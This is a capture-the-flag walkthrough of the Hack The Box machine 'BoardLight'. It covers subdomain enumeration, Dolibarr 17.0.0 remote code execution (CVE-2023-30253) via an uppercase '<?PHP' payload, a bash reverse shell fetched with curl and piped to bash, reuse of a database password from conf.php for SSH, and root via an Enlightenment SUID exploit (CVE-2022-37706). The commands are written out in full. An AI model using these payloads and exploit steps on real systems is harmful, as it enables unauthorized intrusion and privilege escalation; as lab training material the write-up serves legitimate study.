This box involves exploiting Dolibarr 17.0.0 for remote code execution (RCE) as an authenticated user, gaining access as the www-data user. By understanding the exploit and examining the configuration files, credentials can be found to escalate privileges to user. Additionally, the system is vulnerable to CVE-2022-37706, which allows for further privilege escalation providing root access.
Nmap scan
First, we start by checking open ports
nmap -sV -sC 10.10.11.11 -v
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have web and ssh services running.
Web enumeration
Checking the page source, I've found a domain
โโ$ curl -s http://10.10.11.11 |grep htb
[email protected]
<a href="https://html.design/">Board.htb</a>
We can add it to the hosts file
echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts
And we have a comment in the page
curl http://board.htb | grep '<!'
<!-- Basic -->
<!-- Mobile Metas -->
<!-- Site Metas -->
<!-- slider stylesheet -->
<!-- slider stylesheet -->
<!-- bootstrap core css -->
<!-- fonts style -->
<!-- Custom styles for this template -->
<!-- responsive style -->
<!-- header section strats -->
<!-- <a class="nav-link" href="portfolio.php"> Portfolio </a> -->
The http://board.htb/portfolio.php exist but we don't know the parameters. I've tried to bruteforce them without any luck.
Subdomain enumeration
This step was really tricky. I am not really sure why gobuster failed so I've tried multiple times with ffuf and finally got a hit
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.board.htb" -fw 6243 -u http://board.htb
:: Method : GET
:: URL : http://board.htb
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.board.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 6243
________________________________________________
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 107ms]
We can add this subdomain to the hosts as well
echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts
CVE-2023-30253
Checking the page http://crm.board.htb/
It's dolibarr 17.0.0 . Searching for CVE's related to this version quickly revealed the CVE-2023-30253
CVE-2023-30253 is a critical vulnerability in Dolibarr versions before 17.0.1, allowing remote code execution (RCE) via uppercase manipulation: <?PHP instead of <?php. Exploiting this RCE vulnerability requires an authenticated user to leverage exploit scripts and generate payloads, enabling dynamic content on the vulnerable target. Understanding the exploit is crucial for effectively exploiting the vulnerable target and executing commands to compromise the system.
First shell
I've searched for the default creds for dolibarr and it was admin:admin
Following the article from where I've found the CVE details , I was able able to get command execution!
So we can create a bash reverse shell
#!/bin/bash
bash -i >& /dev/tcp/10.10.16.x/4444 0>&1
Run a listener on port 4444
nc -vlp 4444
From another terminal, host the shell
python3 -m http.server
Going to http://crm.board.htb/website/index.php and create a website called test
Then creating a page called test
Finally click on Edit HTML source and insert the payload (adding the payload directly can work as well)
<?PHP echo system("curl http://10.10.16.x:8000/shell.sh | bash");?>
and got a shell back!
โ$ nc -vlp 4444
listening on [any] 4444 ...
connect to [10.10.16.x] from board.htb [10.10.11.11] 45992
bash: cannot set terminal process group (885): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/website$
Second way
Searching for the exploit using poc-seeker
-----------------------------
-> CVE id : CVE-2023-30253
-> CVE description : Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.
-> Base score : 8.8
-> Attack complexity : LOW
-> User interaction : NONE
-> Required privileges : LOW
------------------------------
๐ค Searching github DONE
๐ค Searching sploitus DONE
๐ค Searching exploit db DONE
๐ค Searching vulnerability lab DONE
๐ I think I've found potential POC for you ๐
[+] https://github.com/04Shivam/CVE-2023-30253-Exploit
[+] https://github.com/Rubikcuv5/cve-2023-30253
[+] https://github.com/g4nkd/CVE-2023-30253-PoC
[+] https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
๐ง You may have a look at the following ๐ง
[!] -
[!] https://github.com/04Shivam/CVE-2023-30253
[!] https://github.com/andria-dev/DolibabyPhp
[!] https://github.com/dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253
Trying the first POC works!
โ$ python3 CVE-2023-30253.py
Enter the domain name (eg: app.hackthebox.com)
>>>crm.board.htb
Enter the ip address for reverse shell
>>>10.10.14.x
Enter port number for reverse shell
>>>4444
[+] Username password used admin:admin
[+] Extracted CSRF Token
[+] Logged In successfully
[+] Website created successfully
[+] Page created successfully
[+] Payload uploaded
[+] Payload Execution Url: http://crm.board.htb/public/website/index.php?website=0e1fef09ad10419da88c72f0d7e986d9&pageid=4
[+] Check your listner
[+] Payload Executed
Own user
Trying to list the files and dirs
www-data@boardlight:~/html/crm.board.htb/htdocs$ ls -lht
ls -lht
total 576K
drwxr-xr-x 2 www-data www-data 4.0K May 17 00:18 conf
drwxr-xr-x 11 www-data www-data 4.0K Mar 4 2023 accountancy
drwxr-xr-x 9 www-data www-data 4.0K Mar 4 2023 adherents
drwxr-xr-x 6 www-data www-data 4.0K Mar 4 2023 admin
the conf dir modification date is interesting. Checking the config files
www-data@boardlight:~/html/crm.board.htb/htdocs$ cat conf/conf.php
cat conf/conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
Found a password: serverfun2$2023!!
To get the user, we can just check the /home (HackTHeBox style), or check the users that have login shell in /etc/passwd
ls /home
larissa
Trying to ssh with the user larissa with the found password worked!
โโ$ ssh [email protected]
The authenticity of host 'board.htb (10.10.11.11)' can't be established.
ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'board.htb' (ED25519) to the list of known hosts.
[email protected]'s password:
...
larissa@boardlight:~$ wc -c user.txt
33 user.txt
Own root
Executing linpeas revealed few unknown setuid binaries
โโโโโโโโโโโโฃ SUID - Check easy privesc, exploits and write perms
โ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 15K Apr 8 18:36 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)
This can also be done using:
find / -perm -4000 2>/dev/null
Checking the enlightenment version:
enlightenment --version
ESTART: 0.00002 [0.00002] - Begin Startup
ESTART: 0.00090 [0.00088] - Signal Trap
ESTART: 0.00115 [0.00025] - Signal Trap Done
ESTART: 0.00243 [0.00127] - Eina Init
ESTART: 0.00359 [0.00116] - Eina Init Done
ESTART: 0.00360 [0.00001] - Determine Prefix
ESTART: 0.00442 [0.00082] - Determine Prefix Done
ESTART: 0.00443 [0.00002] - Environment Variables
ESTART: 0.00444 [0.00001] - Environment Variables Done
ESTART: 0.00445 [0.00000] - Parse Arguments
Version: 0.23.1
E: Begin Shutdown Procedure!
The version is 0.23.1.
Searching for a CVE related to this version returns CVE-2022-37706
CVE-2022-37706 is a critical Linux vulnerability that allows local users to escalate privileges by manipulating pathnames in a system library.
Create a directory with a name that exploits the pathname vulnerability. This directory structure includes "/dev/../tmp/;", which is treated by the vulnerable function in a special way, followed by /tmp/exploit
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
Create the exploit script:
echo "/bin/bash" > /tmp/exploit
chmod a+x /tmp/exploit
Executing the exploit:
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
- /usr.../.. /bin/mount: Executes the mount command through a potentially vulnerable function stored in the variable file.
- -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u): Various mount options. The critical part here is uid=$(id -u), which runs the mount command with the current user's ID.
- "/dev/../tmp/;/tmp/exploit" /tmp///net: The key part of the exploit. This path exploits the pathname handling vulnerability to execute /tmp/exploit (which contains /bin/bash), giving the attacker a root shell.
larissa@boardlight:~$ /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
mount: /dev/../tmp/: can't find in /etc/fstab.
root@boardlight:/home/larissa#
root@boardlight:/home/larissa# wc -c /root/root.txt
33 /root/root.txt
root@boardlight:/home/larissa#
Finally the box is owned!